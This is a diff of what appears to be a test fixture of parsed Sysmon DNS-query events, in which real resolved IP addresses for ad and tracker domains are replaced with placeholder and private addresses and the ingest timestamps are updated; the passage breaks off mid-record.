@@ -18615,26 +18371,15 @@ "tg.socdm.com" ], "ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313966071Z", + "ingested": "2021-12-09T13:49:44.739957800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18705,12 +18450,12 @@ "type": "CNAME" }, { - "data": "68.67.153.75", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "network": { 
@@ -18726,13 +18471,13 @@ "prebid.adnxs.com" ], "ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313967420Z", + "ingested": "2021-12-09T13:49:44.739962900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18804,12 +18549,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -18827,13 +18572,13 @@ "ul1.dvtps.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313968727Z", + "ingested": "2021-12-09T13:49:44.739966700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
@@ -18905,7 +18650,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313970062Z", + "ingested": "2021-12-09T13:49:44.739971300Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067946300Z'/\u003e\u003cEventRecordID\u003e200\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.912\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -18975,12 +18720,12 @@ "type": "CNAME" }, { - "data": "23.3.125.199", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "network": { 
@@ -18997,13 +18742,13 @@ "tags.bluekai.com" ], "ip": [ - "23.3.125.199" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313971308Z", + "ingested": "2021-12-09T13:49:44.739977200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.068Z", @@ -19063,27 +18808,27 @@ }, "answers": [ { - "data": "104.19.195.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.199.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.198.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.197.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.19.196.151", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { 
@@ -19091,7 +18836,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19099,7 +18844,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19107,23 +18852,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -19138,24 +18883,20 @@ "cdnjs.cloudflare.com" ], "ip": [ - "104.19.195.151", - "104.19.199.151", - "104.19.198.151", - "104.19.197.151", - "104.19.196.151", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313972676Z", + "ingested": "2021-12-09T13:49:44.739980800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19215,23 +18956,23 @@ }, "answers": [ { - "data": "85.194.243.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.243.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.240.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.242.103", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19239,7 +18980,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19247,7 +18988,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19255,7 +18996,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19264,17 +19005,17 @@ } ], "resolved_ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -19290,24 +19031,21 @@ "pixel.onaudience.com" ], "ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313973932Z", + "ingested": "2021-12-09T13:49:44.740019100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData 